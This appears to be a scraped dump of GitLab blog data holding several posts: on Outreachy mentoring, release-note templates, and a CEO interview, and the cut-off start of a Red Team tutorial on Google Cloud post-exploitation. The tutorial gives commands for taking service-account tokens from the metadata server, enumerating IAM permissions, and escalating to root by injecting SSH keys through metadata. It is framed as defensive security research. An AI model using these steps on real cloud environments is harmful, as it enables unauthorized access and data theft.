mentor shares experience\n\n_Christian, the Outreachy mentor and GitLab team member who worked with Joey and Charvi, shares what the experience was like in his own words._\n\nThere are many rewarding parts to being a mentor. I really enjoy seeing mentees gain confidence over the weeks in their abilities to contribute significantly by themselves.\n\n> Since Git is used by more than 80% of the developers in the world, I hope that the Outreachy interns get the feeling that they can improve things even in small ways for millions of people and that their work can have a global impact. - Christian\n\nI also really enjoy it when former mentees want to continue contributing to the Git community after their internship. Outreachy alumni contributions can take many forms. Sometimes they continue to contribute on the same topic as their project, sometimes they participate in related discussions, even 10 years later. One of our mentees was recently hired to work full-time on Git. And it is of course great when they want to become mentors, so they can give back to the program and increase the number of people who can get mentored.\n\nIt's great too that Outreachy, Google, and sometimes the Git project itself all provide funds for former mentees to come to in-person Git events or open source-related conferences. Meeting mentees in-person is very rewarding. At in-person events, the interns can also meet a number of Git-related companies and people, and of course, learn even more about Git and open source. For some of them, it was the first time they traveled outside of their country or could visit a different continent.\n\n#### Mentorship comes with challenges\n\nThe most challenging part of being a mentor is the fact that the Git codebase is getting bigger and more complex as Git evolves and gains features all the time.\n\nThis makes it hard for participants to stay on track when the internship starts. They sometimes have to trust that following the process we suggest will lead them to better and better understanding until they can find their own way and become autonomous.\n\n## Outreach interns share their key takeaways\n\nWe asked Joey and Charvi to share some of the ways that the Outreachy technology internship has impacted them.\n\n### Joey has a better understanding of herself\n\n_This section was written by Joey._\n\n> My Outreachy internship helped me better define the type of team and community that I'd like to join and which will benefit the most from the wide range of skills that I can offer. – Joey\n\nOutreachy was an amazing help, not only in technical areas, but also with soft skills. For example, I formed a solid understanding of Git. Now I can use `git cherry-pick` and `git rebase`, as well as squash, comfortably since I understand better what they do, and how. Those Git commands gave me lots of trouble when I was a junior developer for [BIND](https://en.wikipedia.org/wiki/BIND), and now they don't give me trouble anymore. I also reinforced fundamentals in C -- implementing pointers and references without panic and knowing about vtables -- and I learned how to write test cases in Python.\n\nA crowning achievement was finding balance between patience and impatience, and between autonomy and guidance.\n\n### Charvi has fallen in love with the open source world\n\n_This section was written by Charvi._\n\n> Outreachy helped me start my open source journey. - Charvi\n\nI have always been fascinated with the open source work culture as a way to learn, share, and grow. I finally got wonderful working experience too, since both Outreachy and the Git project are prestigious organizations.\n\nI learned a lot throughout the entire internship, starting from when the Outreachy contribution period began before I qualified for the internship. On the technical side, I enhanced my C programming and debugging skills, learned to write neat code, learned about shell scripts, and developed a deeper understanding of Git commands and about the Git project workflow.\n\nApart from this, my internship helped me improve my communication skills, make connections with amazing software developers, and  become more confident in myself. I am sincerely thankful for the Outreachy program, Git community, and my mentors, Christian and Phillip. It was an amazing learning journey.\n\n## So what's next?\n\nNow that the Outreachy internship has concluded, both Joey and Charvi are ready to leverage their skills and experience working on the Git project to future work in FOSS. Learn more about [Charvi's experience](https://charvi-077.github.io/about/) and [Joey's experience](https://about.me/gomezsalazar-jogebeth) by following the links.\n\n## GitLab's continued internship opportunities\n\nGitLab is proud to have sponsored and mentored an intern for the Git project during the most recent round of Outreachy technology internships. We hope to someday qualify for our own Outreachy interns to work on the [GitLab FOSS project](https://gitlab.com/gitlab-org/gitlab-foss) (which celebrates 10 years in October 2021).\n\nThis summer, GitLab will also be participating for the first time in [Google Summer of Code 2021](https://summerofcode.withgoogle.com/organizations/4961424868114432/). We look forward to mentoring engineering students through that technology internship program.\n\nIn addition to participating in these two great technology internship programs, GitLab held its first [engineering internship program](/handbook/engineering/internships/) in 2020 with great success. As a result, GitLab will continue to hire interns for various projects and teams in an ongoing fashion, with a specific [focus on recruiting interns from underrepresented groups in engineering](/handbook/engineering/internships/#recruitment).\n\nWe look forward to supporting these programs that help foster diversity in open source and the wider tech industry, and are excited for the year ahead!\n",[9,751,4141],{"slug":4337,"featured":6,"template":689},"outreachy-sponsorship-winter-2020","content:en-us:blog:outreachy-sponsorship-winter-2020.yml","Outreachy Sponsorship Winter 2020","en-us/blog/outreachy-sponsorship-winter-2020.yml","en-us/blog/outreachy-sponsorship-winter-2020",{"_path":4343,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4344,"content":4350,"config":4355,"_id":4357,"_type":14,"title":4358,"_source":16,"_file":4359,"_stem":4360,"_extension":19},"/en-us/blog/pair-gitlab-and-the-good-docs-project-template-to-improve-release-notes",{"title":4345,"description":4346,"ogTitle":4345,"ogDescription":4346,"noIndex":6,"ogImage":4347,"ogUrl":4348,"ogSiteName":673,"ogType":674,"canonicalUrls":4348,"schema":4349},"Pair GitLab and The Good Docs Project template to improve release notes","Creating compelling, detailed, human-readable notes for software releases is important. Using GitLab and this template from The Good Docs Project makes it easier.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1750099541/Blog/Hero%20Images/Blog/Hero%20Images/AdobeStock_432673748_5xWPNsktdz2QChWhl16jGq_1750099540656.jpg","https://about.gitlab.com/blog/pair-gitlab-and-the-good-docs-project-template-to-improve-release-notes","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Pair GitLab and The Good Docs Project template to improve release notes\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Aaron Peters, Member, Good Docs Project\"}],\n        \"datePublished\": \"2024-01-23\",\n      }",{"title":4345,"description":4346,"authors":4351,"heroImage":4347,"date":4352,"body":4353,"category":10,"tags":4354},[1659],"2024-01-23","Release notes allow software users to quickly understand the changes that come with the latest version of software. They also allow software publishers to highlight changes as important, or provide crucial information about the impact an upgrade may have. Some tools allow developers to \"generate\" release notes based on sources of data (such as completed items in DevOps systems), but notes produced this way tend to simply list changes without context. Writing release notes, however, provides teams with the opportunity to \"tell the story\" of the changes the new software version will bring.\n\nThough this process certainly requires a greater investment of time than publishing a basic changelog does, your users will certainly appreciate the results: release notes that explain the key elements of the release (such as new features, improvements, and known issues) in a well-organized, human-readable way.\n\n[The Good Docs Project's](https://thegooddocsproject.dev/welcome/) release notes template is designed to help you do exactly that. And the combination of GitLab's work management platform and our own [Release Notes template](https://gitlab.com/tgdp/templates/-/tree/main/release-notes?ref_type=heads) makes the job of putting out good, informative release notes easier.\n\n## The anatomy of quality release notes\n\nRelease notes that provide readers with a good picture of the version's changes require two primary inputs:\n\n- **A list of the changes included in the release**\n  At The Good Docs Project, all the management of the work of our contributors occurs in GitLab. So it's easy to refer to our release plans to identify which additions and improvements were completed and included in the release.\n- **A description of those changes including reasoning, importance, and impact**\n  This is where our project's Release Notes template can assist. Rather than staring at a blank page, wondering where to start, users can begin to fill in our template step-by-step, adjusting to taste.\n\nWe'll walk through each of these steps in the following sections as they occurred when creating the release notes to [our recent Dragon release](https://gitlab.com/tgdp/templates/-/releases/v1.1.0).\n\n## Gathering a release's changes\n\nAt The Good Docs Project, we use GitLab features — including setting milestones, creating/assigning issues, and tagging releases — to get our work out into the community (our prior blog post here at GitLab describes this process). The platform allows our worldwide contributor base to easily discover new things to work on and update everyone on their progress once they select something. When the time comes to package a release, it brings the added benefit of a tidy list of issues included in the project at the time of release.\n\n\u003Cimg src=\"https://res.cloudinary.com/about-gitlab-com/image/upload/v1752176084/Blog/hxo08y06apkumwuwm80c.png\" alt=\"The Milestone screen in GitLab provides an easy-to-scan list of work included in the release\" width=\"100%\" height=\"auto\">\n\nWhen creating the release notes for our project's Dragon milestone, we reviewed all the items included in the **Closed** column on the Milestone screen. This allowed us to pick the most important changes to highlight, while leaving out issues that wouldn't significantly impact a user's experience.\n\n## Crafting the release notes\n\nEquipped with a list of all the key updates in the release, we start writing the release notes. Our project's [Release Notes template](https://gitlab.com/tgdp/templates/-/blob/main/release-notes/template-release-notes.md?ref_type=heads) provides a ready-made Markdown skeleton comprised of key sections based on our contributors' research and experience. The accompanying [usage guide](https://gitlab.com/tgdp/templates/-/blob/main/release-notes/guide-release-notes.md?ref_type=heads) and [example of the template in action](https://gitlab.com/tgdp/templates/-/blob/main/release-notes/example-release-notes.md?ref_type=heads) provides additional tips and suggestions for writing effective release notes. The latter references our **Chronologue** project, a fictional telescope and application that can see through time, which is naturally well-documented.\n\n\u003Cimg src=\"https://res.cloudinary.com/about-gitlab-com/image/upload/v1752176091/Blog/jcpfxjqb5jpidssm3jlr.png\" alt=\"The Release Notes template comes ready to populate with 'the story' of your latest release\" width=\"100%\" height=\"auto\">\n\nOf course, our template is simply a starting point. Teams should always feel free to add sections where they make sense, remove them where they don't, and make the style of it their own. For example, we left out the **Bug fixes** and **Known issues** sections in our latest Dragon release notes, instead focusing on the new additions and improvements this release brought.\n\n## Adding release notes to the release\n\nGitLab's build tools also make it easy to add our notes while actually creating the release. First, we tagged one of our project's commits, then created a release from the tag. On GitLab's **Releases > New** screen, we can copy and paste the Markdown we wrote to automatically format the release notes.\n\n\u003Cimg src=\"https://res.cloudinary.com/about-gitlab-com/image/upload/v1752176096/Blog/otwduhvokgnqclon4ugx.png\" alt=\"Our templates are already in Markdown format, so when it's time to paste them into the release it works automagically!\" width=\"100%\" height=\"auto\">\n\nAnd just like that our release notes are done. With the assistance of the template, they required just an hour to write. And after an additional half-hour of work creating the release, we're ready to send our work out to the community. Our experience using the combination of GitLab and our templates has made the process of shipping our templates a piece of cake.\n\nIf you'd like to check out our templates, feel free to browse [our GitLab project](https://gitlab.com/tgdp).\nOr visit our [community page](https://thegooddocsproject.dev/community/) to learn how to join us in leveling up the state of technical documentation.\n\n*The [GitLab Open Source Partners](https://go.gitlab.com/030Ue3) are building the future of open source on GitLab. [Connect with them](https://gitlab.com/gitlab-com/marketing/developer-relations/open-source-program/gitlab-open-source-partners) on Gitlab.com.*\n",[9,482,267,752],{"slug":4356,"featured":91,"template":689},"pair-gitlab-and-the-good-docs-project-template-to-improve-release-notes","content:en-us:blog:pair-gitlab-and-the-good-docs-project-template-to-improve-release-notes.yml","Pair Gitlab And The Good Docs Project Template To Improve Release Notes","en-us/blog/pair-gitlab-and-the-good-docs-project-template-to-improve-release-notes.yml","en-us/blog/pair-gitlab-and-the-good-docs-project-template-to-improve-release-notes",{"_path":4362,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4363,"content":4369,"config":4375,"_id":4377,"_type":14,"title":4378,"_source":16,"_file":4379,"_stem":4380,"_extension":19},"/en-us/blog/pick-your-brain-interview-jake-stein",{"title":4364,"description":4365,"ogTitle":4364,"ogDescription":4365,"noIndex":6,"ogImage":4366,"ogUrl":4367,"ogSiteName":673,"ogType":674,"canonicalUrls":4367,"schema":4368},"Open source lessons learned: My interview with GitLab’s CEO","Stitch CEO and co-founder Jake Stein sits down for a pick your brain meeting with GitLab CEO Sid Sijbrandij.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749680388/Blog/Hero%20Images/pyb-jake-stein.jpg","https://about.gitlab.com/blog/pick-your-brain-interview-jake-stein","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Open source lessons learned: My interview with GitLab’s CEO\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Jake Stein\"}],\n        \"datePublished\": \"2017-08-18\",\n      }",{"title":4364,"description":4365,"authors":4370,"heroImage":4366,"date":4372,"body":4373,"category":10,"tags":4374},[4371],"Jake Stein","2017-08-18","\n_GitLab CEO Sid Sijbrandij occasionally sits down for a \"[pick your brain](/handbook/eba/ceo-scheduling/#pick-your-brain-meetings)\"\nmeeting with people seeking advice on open source, remote work, or discussion of other things related to GitLab._\n\nWhen we launched Singer, our [open source ETL project](https://www.singer.io/) at [Stitch](https://www.stitchdata.com/), I was looking for advice on the best strategies to make it successful. August Capital is an investor in both Stitch and GitLab, and they were kind enough to introduce me to Sid Sijbrandij, CEO of GitLab. Sid was very generous with his time, and he shared some of his lessons learned about open source.  \n\n\u003C!-- more -->\n\n## GitLab’s unique approach\n\nAs I explained Stitch to Sid, he asked a few follow up questions, and then shared information about a plan to build up the GitLab analytics stack. I didn’t set up the call intending to sell, but before it was over, he had added us to the publicly accessible page listing the tools that their team plans to evaluate. Their transparency is very impressive, and it eliminates the friction that can slow down a traditional company.\n\n## Open source adoption\n\nVirtually all of GitLab’s paying customers have come from their open source user base. While GitLab has a large sales team, they are primarily focused on converting users to the paid products rather than getting new GitLab users.  \n\nOver 100,000 organizations use GitLab, and their product and engineering teams are responsible for growing that number. One of most important drivers of that growth has been improving the first run experience and time to value.  \n\nWe already had plans to improve the Singer user experience, but Sid encouraged me to take it a step further. The most common use case for Singer, and ETL in general, is pulling data into a database and then visualizing the data. He recommended that we bundle Singer with a PostgreSQL database and an open source visualization tool like Metabase into a easy-to-use package, potentially in a Docker container, which will allow users to get to their end goal much faster.\n\nThis was a really interesting idea that had not occurred to our team before. It motivated us to start thinking more holistically about the goals of our open source users, and I’m confident that this will help us grow adoption of Singer.  \n\n## Open source business model\n\nGitLab started as a free, open source tool and later introduced an enterprise edition and the free SaaS version of GitLab.com. Several years later, in April of 2017, they introduced paid tiers on GitLab.com.\n\nWe’ve taken a very different path with Stitch. We launched with a freemium SaaS service, and subsequently added an enterprise edition of the SaaS product and the free, open source Singer project.  \n\nI thought that the differences in GitLab’s path might have been due to a philosophical decision about business model sequence, but it was much more practical. GitLab started as an open source project, and a business was created around it only after the project had significant traction. In the early days of the business, on-premises was where all of the usage was, so that’s where they started to charge. The original SaaS product was free so it could get traction and build a network effect. As the SaaS product got better, and as the cost of hosting the ever-growing number of SaaS users increased, they launched paid tiers.  \n\nWhile Stitch and GitLab had very different beginnings, our business models have evolved in a similar direction. It was great to get the benefit of the lessons that Sid has learned as we chart our own course.  \n\n## About the Guest Author\n\nJake Stein is the co-founder and CEO of Stitch. Prior to Stitch, Stein was co-founder and COO at RJMetrics, a business intelligence software company that was acquired by Magento in 2016. Before founding RJMetrics, Jake worked at Insight Venture Partners, a software-focused venture capital and private equity firm. He graduated from the Wharton School at the University of Pennsylvania with high honors and concentrations in Finance and Entrepreneurship.\n",[845,9],{"slug":4376,"featured":6,"template":689},"pick-your-brain-interview-jake-stein","content:en-us:blog:pick-your-brain-interview-jake-stein.yml","Pick Your Brain Interview Jake Stein","en-us/blog/pick-your-brain-interview-jake-stein.yml","en-us/blog/pick-your-brain-interview-jake-stein",{"_path":4382,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4383,"content":4389,"config":4395,"_id":4397,"_type":14,"title":4398,"_source":16,"_file":4399,"_stem":4400,"_extension":19},"/en-us/blog/plundering-gcp-escalating-privileges-in-google-cloud-platform",{"title":4384,"description":4385,"ogTitle":4384,"ogDescription":4385,"noIndex":6,"ogImage":4386,"ogUrl":4387,"ogSiteName":673,"ogType":674,"canonicalUrls":4387,"schema":4388},"Google Cloud privilege escalation & post-exploitation tactics","A Red Team exercise on exploiting design decisions on GCP.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749672755/Blog/Hero%20Images/white-lightning-heating-mountain.jpg","https://about.gitlab.com/blog/plundering-gcp-escalating-privileges-in-google-cloud-platform","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Tutorial on privilege escalation and post exploitation tactics in Google Cloud Platform environments\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Chris Moberly\"}],\n        \"datePublished\": \"2020-02-12\",\n      }",{"title":4390,"description":4385,"authors":4391,"heroImage":4386,"date":4392,"body":4393,"category":865,"tags":4394},"Tutorial on privilege escalation and post exploitation tactics in Google Cloud Platform environments",[2541],"2020-02-12","\n## Update\n\n_At GitLab we have an internal [Red Team](/handbook/security/threat-management/red-team/) that dedicates time looking at the services and business partners we use to deliver GitLab products and services. As a [Google Cloud customer,](/blog/moving-to-gcp/) we have an obvious interest in all the different ways that administrators can make devastating security related mistakes when configuring their environment. We also have a team goal of sharing our research and tooling when possible with the community. This blog post and our previous post, [Introducing Token Hunter, an open source tool for finding sensitive data in the vast, wide-open,](/blog/introducing-token-hunter/) are our attempts to share our knowledge with the broader security community - for our mutual benefit._\n\n_This post does not outline any new vulnerabilities in Google Cloud Platform but outlines ways that an attacker who has already gained an unprivileged foothold on a cloud instance may perform reconnaissance, privilege escalation and eventually complete compromise of an environment._\n\n## Introduction\n\nWe recently embarked on a journey to simulate malicious activity in Google Cloud Platform (GCP). The idea was to begin with the low-privilege compromise of a Linux virtual machine, and then attempt to escalate privileges and access sensitive data throughout the environment.\n\nThe problem? There just isn't a lot of information available about GCP written from an attacker's perspective. We set out to learn as much as we could about Google Cloud and how an attacker might work to abuse common design decisions. Now, we are sharing that information with you! I'll also be presenting this talk, [Plundering GCP – escalating privileges, moving laterally and stealing secrets in Google Cloud](https://www.bsidesmelbourne.com/2020-plundering-gcp.html), in March 2020 at BSides Melbourne.\n\nIn this tutorial, we will do a very deep-dive into manual post-exploitation tactics and techniques for GCP. The specific scenario we are addressing here is the compromise of a single Linux-based virtual machine running within the Compute Engine offering. The goal is to elevate local privileges to a root account, compromise other systems within the same Google Cloud [Project](https://cloud.google.com/storage/docs/projects), break out of that project into others, and even hop the fence over to G Suite if possible.\n\nWe'll also go into specific detail on how to interact with a slew of Google's cloud services to hunt for secrets and exfiltrate sensitive data.\n\nIf you're tasked with defending infrastructure in Google Cloud, this tutorial should give you a good idea of what an attacker may get up to and the types of activities you should be looking out for.\n\nThis blog also introduces several utilities targeting GCP environments:\n\n- [gcp_firewall_enum](https://gitlab.com/gitlab-com/gl-security/gl-redteam/gcp_firewall_enum): Generate targeted port scans for Compute Instances exposed to the internet.\n- [gcp_enum](https://gitlab.com/gitlab-com/gl-security/gl-redteam/gcp_enum): Most of the enumeration commands in this blog, consolidated to a single script.\n- [gcp_misc](https://gitlab.com/gitlab-com/gl-security/gl-redteam/gcp_misc): Various tools for attacking GCP environments.\n\n*No shell? No problem! Most of these techniques can used with SSRF as well. Check out the [Leveraging SSRF](#leveraging-ssrf) appendix for more info.*\n\n## Basic background info\n\nGCP is a big beast with a ton of moving parts. Here is a bit of background on items that are most relevant to the breach of a Compute Instance.\n\n### Tools\n\n#### gcloud\n\nIt is likely that the box you land on will have the [GCP SDK tools](https://cloud.google.com/sdk/docs/) installed and configured. A quick way to verify that things are set up is to run the following command:\n\n```\n$ gcloud config list\n```\n\nIf properly configured, you should get some output detailing the current service account and project in use.\n\nThe [gcloud command set](https://cloud.google.com/sdk/gcloud/reference/) is pretty extensive, supports tab completion, and has excellent online and built-in documentation. You can also install it locally on your own machine and use it with credential data that you obtain.\n\n#### Cloud APIs\n\nThe `gcloud` command is really just a way of automating [Google Cloud API](https://cloud.google.com/apis/docs/overview) calls. However, you can also perform them manually. Understanding the API endpoints and functionality can be very helpful when you're operating with a very specific set of permissions, and trying to work out exactly what you can do.\n\nYou can see what the raw HTTP API call for any individual `gcloud` command is simply by appending `--log-http` to the command.\n\n#### Metadata endpoint\n\nEvery Compute Instance has access to a dedicated [metadata server](https://cloud.google.com/compute/docs/storing-retrieving-metadata) via the IP address 169.254.169.254. You can identify it as a host file entry like the one below:\n\n```\n$ cat /etc/hosts\n[...]\n169.254.169.254 metadata.google.internal  # Added by Google\n```\n\nThis metadata server allows any processes running on the instance to query Google for information about the instance it runs on and the project it resides in. No authentication is required - default `curl` commands will suffice.\n\nFor example, the following command will return information specific to the Compute Instance it is run from.\n\n```\n$ curl \"http://metadata.google.internal/computeMetadata/v1/?recursive=true&alt=text\" \\\n    -H \"Metadata-Flavor: Google\"\n```\n\n### Security concepts\n\nWhat you can actually do from within a compromised instance is the resultant combination of service accounts, access scopes, and IAM permissions. These are described below.\n\n#### Resource hierarchy\n\nGoogle Cloud uses a [Resource hierarchy](https://cloud.google.com/resource-manager/docs/cloud-platform-resource-hierarchy) that is similar, conceptually, to that of a traditional filesystem. This provides a logical parent/child workflow with specfic attachment points for policies and permissions.\n\nAt a high level, it looks like this:\n\n```\nOrganization\n--> Folders\n  --> Projects\n    --> Resources\n```\n\nThe scenario this blog addresses is the compromise of a virtual machine (called a Compute Instance), which is a resource. This resource resides in a project, probably alongside other Compute Instances, storage buckets, etc.\n\nWe will work to compromise as much as we can inside that project, and then eventually to branch out into other projects within the same organization. A full compromise of the organization itself would be great, but gaining access to confidential assets may be possible simply by exploring the resources in a single project.\n\n#### Service accounts\n\nVirtual machine instances are usually assigned a service account. Every GCP project has a [default service account](https://cloud.google.com/compute/docs/access/service-accounts#default_service_account), and this will be assigned to new Compute Instances unless otherwise specified. Administrators can choose to use either a custom account or no account at all. This service account can be used by any user or application on the machine to communicate with the Google APIs. You can run the following command to see what accounts are available to you:\n\n```\n$ gcloud auth list\n```\n\nDefault service accounts will look like one of the following:\n\n```\nPROJECT_NUMBER-compute@developer.gserviceaccount.com\nPROJECT_ID@appspot.gserviceaccount.com\n```\n\nMore savvy administrators will have configured a custom service account to use with the instance. This allows them to be more granular with permissions.\n\nA custom service account will look like this:\n\n```\nSERVICE_ACCOUNT_NAME@PROJECT_NAME.iam.gserviceaccount.com\n```\n\nIf `gcloud auth list` returns multiple accounts available, something interesting is going on. You should generally see only the service account. If there is more than one, you can cycle through each using `gcloud config set account [ACCOUNT]` while trying the various tasks in this blog.\n\n#### Access scopes\n\nThe service account on a GCP Compute Instance will use OAuth to communicate with the Google Cloud APIs. When [access scopes](https://cloud.google.com/compute/docs/access/service-accounts#accesscopesiam) are used, the OAuth token that is generated for the instance will have a [scope](https://oauth.net/2/scope/) limitation included. This defines what API endpoints it can authenticate to. It does NOT define the actual permissions.\n\nWhen using a custom service account, Google [recommends](https://cloud.google.com/compute/docs/access/service-accounts#service_account_permissions) that access scopes are not used and to rely totally on IAM. The web management portal actually enforces this, but access scopes can still be applied to instances using custom service accounts programatically.\n\nThere are three options when setting an access scope on a VM instance:\n- Allow default access\n- All full access to all cloud APIs\n- Set access for each API\n\nYou can see what scopes are assigned by querying the metadata URL. Here is an example from a VM with \"default\" access assigned:\n\n```\n$ curl http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes \\\n    -H 'Metadata-Flavor:Google'\n\nhttps://www.googleapis.com/auth/devstorage.read_only\nhttps://www.googleapis.com/auth/logging.write\nhttps://www.googleapis.com/auth/monitoring.write\nhttps://www.googleapis.com/auth/servicecontrol\nhttps://www.googleapis.com/auth/service.management.readonly\nhttps://www.googleapis.com/auth/trace.append\n```\n\nThe most interesting thing in the default scope is `devstorage.read_only`. This grants read access to all storage buckets in the project. This can be devastating, which of course is great for us as an attacker.\n\nHere is what you'll see from an instance with no scope limitations:\n\n```\n$ curl http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes -H 'Metadata-Flavor:Google'\nhttps://www.googleapis.com/auth/cloud-platform\n```\n\nThis `cloud-platform` scope is what we are really hoping for, as it will allow us to authenticate to any API function and leverage the full power of our assigned IAM permissions. It is also Google's recommendation as it forces administrators to choose only necessary permissions, and not to rely on access scopes as a barrier to an API endpoint.\n\nIt is possible to encounter some conflicts when using both IAM and access scopes. For example, your service account may have the IAM role of `compute.instanceAdmin` but the instance you've breached has been crippled with the scope limitation of `https://www.googleapis.com/auth/compute.readonly`. This would prevent you from making any changes using the OAuth token that's automatically assigned to your instance.\n\n#### Identify and access management (IAM)\n\nIAM permissions are used for fine-grained access control. There are [a lot](https://cloud.google.com/iam/docs/permissions-reference) of them. The permissions are bundled together using three types of [roles](https://cloud.google.com/iam/docs/understanding-roles):\n\n- Primitive roles: Owner, Editor, and Viewer. These are the old-school way of doing things. The default service account in every project is assigned the Editor role. This is insecure and we love it.\n- Predefined roles: These roles are managed by Google and are meant to be combinations of most-likely scenarios. One of our favorites is the `compute.instanceAdmin` role, as it allows for easy privilege escalation.\n- Custom roles: This allows admins to group their own set of granular permissions.\n\nAs of this writing, there are 2,574 fine-grained permissions in IAM. These individual permissions are bundled together into a role. A role is connected to a member (user or service account) in what Google calls a [binding](https://cloud.google.com/iam/docs/reference/rest/v1/Policy#binding). Finally, this binding is applied at some level of the GCP hiearchy via a [policy](https://cloud.google.com/iam/docs/reference/rest/v1/Policy).\n\nThis policy determines what actions are allowed - it is the intersection between accounts, permissions, resources, and (optionally) conditions.\n\nYou can try the following command to specifically enumerate roles assigned to your service account project-wide in the current project:\n\n```\n$ PROJECT=$(curl http://metadata.google.internal/computeMetadata/v1/project/project-id \\\n    -H \"Metadata-Flavor: Google\" -s)\n$ ACCOUNT=$(curl http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/email \\\n    -H \"Metadata-Flavor: Google\" -s)\n$ gcloud projects get-iam-policy $PROJECT  \\\n    --flatten=\"bindings[].members\" \\\n    --format='table(bindings.role)' \\\n    --filter=\"bindings.members:$ACCOUNT\"\n```\n\nDon't worry too much if you get denied access to the command above. It's still possible to work out what you can do simply by trying to do it.\n\nMore generally, you can shorten the command to the following to get an idea of the roles assigned project-wide to all members.\n\n```\n$ gcloud projects get-iam-policy [PROJECT-ID]\n```\n\nOr to see the IAM policy [assigned to a single Compute Instance](https://cloud.google.com/sdk/gcloud/reference/compute/instances/get-iam-policy) you can try the following.\n\n```\n$ gcloud compute instances get-iam-policy [INSTANCE] --zone [ZONE]\n```\n\nThere are similar commands for various other APIs. Consult the documentation if you need one other than what is shown above.\n\n### Default credentials\n\n#### Default service account token\n\nThe metadata server available to a given instance will provide any user/process on that instance with an OAuth token that is automatically used as the default credentials when communicating with Google APIs via the `gcloud` command.\n\nYou can retrieve and inspect the token with the following curl command:\n\n```\n$ curl \"http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token\" \\\n    -H \"Metadata-Flavor: Google\"\n```\n\nWhich will receive a response like the following:\n\n```\n{\n      \"access_token\":\"ya29.AHES6ZRN3-HlhAPya30GnW_bHSb_QtAS08i85nHq39HE3C2LTrCARA\",\n      \"expires_in\":3599,\n      \"token_type\":\"Bearer\"\n }\n```\n\nThis token is the combination of the service account and access scopes assigned to the Compute Instance. So, even though your service account may have every IAM privilege imaginable, this particular OAuth token might be limited in the APIs it can communicate with due to access scopes.\n\n#### Application default credentials\n\nAs an alternative to first pulling a token from the metadata server, Google also has a strategy called [Application Default Credentials](https://cloud.google.com/docs/authentication/production). When using one of Google's official GCP client libraries, the code will automatically go searching for credentials to use in a defined order.\n\nThe very first location it would check would be the [source code itself](https://cloud.google.com/docs/authentication/production#passing_the_path_to_the_service_account_key_in_code). Developers can choose to statically point to a service account key file.\n\nThe next is an environment variable called `GOOGLE_APPLICATION_CREDENTIALS`. This can be set to point to a service account key file. Look for the variable itself set in the context of a system account or for references to setting it in scripts and instance metadata.\n\nFinally, if neither of these are provided, the application will revert to using the default token provided by the metadata server as described in the section above.\n\nFinding the actual JSON file with the service account credentials is generally much more desirable than relying on the OAuth token on the metadata server. This is because the raw service account credentials can be activated without the burden of access scopes and without the short expiration period usually applied to the tokens.\n\n## Local privilege escalation\n\nThis section will provide some tips on quick wins for local privilege escalation. If they work right away, great! While getting root locally seems like a logical starting point, though, hacking in the real world is rarely this organized. You may find that you need to jump ahead and grab additional secrets from a later step before you can escalate with these methods.\n\nDon't feel discouraged if you can't get local root right away - keep reading and follow the path that naturally unfolds.\n\n### Follow the scripts!\n\nCompute Instances are there to do things. To do things in Google, they will use their service accounts. And to do things with those service accounts, they likely use scripts!\n\nOften, we'll find ourselves on a Compute Instance and fail to enumerate things like available storage buckets, crypto keys, other instances, etc., due to permission denied errors. IAM permissions are very granular, meaning you can grant permissions to individual resources without granting the permission to list what those resources are.\n\nA great hypothetical example of this is a Compute Instance that has permission to read/write backups to a storage bucket called `instance82736-long-term-xyz-archive-0332893`.\n\nRunning `gsutil ls` from the command line returns nothing, as the service account is lacking the `storage.buckets.list` IAM permission. However, if you ran `gsutil ls gs://instance82736-long-term-xyz-archive-0332893` you may find a complete filesystem backup, giving you clear-text access to data that your local Linux account lacks.\n\nBut how would you know to list the contents of that very-specific bucket name? While brute-forcing buckets is a good idea, there is no way you'd find that in a word list.\n\nBut, the instance is somehow backing up to it. Probably using a script!\n\nLook for references to the `gcloud` command in scripts within the instance's metadata, local filesystem, service unit files, etc. You may also find Python, Ruby, PHP, etc scripts using their own [GCP client libraries](https://cloud.google.com/apis/docs/cloud-client-libraries) that leverage the service account's permissions to get things done.\n\nScripts in general help you understand what the machine is meant to do and will help you in identifying ways to abuse that intended functionality.\n\n### Modifying the metadata\n\nIf you can modify the instance's metadata, there are numerous ways to escalate privileges locally. There are a few scenarios that can lead to a service account with this permission:\n\n*Default service account*\u003Cbr>\nWhen using the default service account, the web management console offers the following options for access scopes:\n\n- Allow default access (default)\n- Allow full access to all Cloud APIs\n- Set access for each API\n\nIf option 2 was selected, or option 3 while explicitly allowing access to the compute API, then this configuration is vulnerable to escalation.\n\n*Custom service account*\u003Cbr>\nWhen using a custom service account, one of the following IAM permissions is necessary to escalate privileges:\n\n- compute.instances.setMetadata (to affect a single instance)\n- compute.projects.setCommonInstanceMetadata (to affect all instances in the project)\n\nAlthough Google [recommends](https://cloud.google.com/compute/docs/access/service-accounts#associating_a_service_account_to_an_instance) not using access scopes for custom service accounts, it is still possible to do so. You'll need one of the following access scopes:\n\n- https://www.googleapis.com/auth/compute\n- https://www.googleapis.com/auth/cloud-platform\n\n#### Add SSH keys to custom metadata\n\nLinux systems on GCP will typically be running [Python Linux Guest Environment for Google Compute Engine](https://github.com/GoogleCloudPlatform/compute-image-packages/tree/master/packages/python-google-compute-engine#accounts) scripts. One of these is the [accounts daemon](https://github.com/GoogleCloudPlatform/compute-image-packages/tree/master/packages/python-google-compute-engine#accounts), which periodically queries the instance metadata endpoint for changes to the authorized SSH public keys.\n\nIf a new public key is encountered, it will be processed and added to the local machine. Depending on the format of the key, it will either be added to the `~/.ssh/authorized_keys` file of an existing user or will create a new user with `sudo` rights.\n\nSo, if you can modify custom instance metadata with your service account, you can escalate to root on the local system by gaining SSH rights to a privileged account. If you can modify custom project metadata, you can escalate to root on any system in the current GCP project that is running the accounts daemon.\n\n##### Add SSH key to existing privileged user\n\nLet's start by adding our 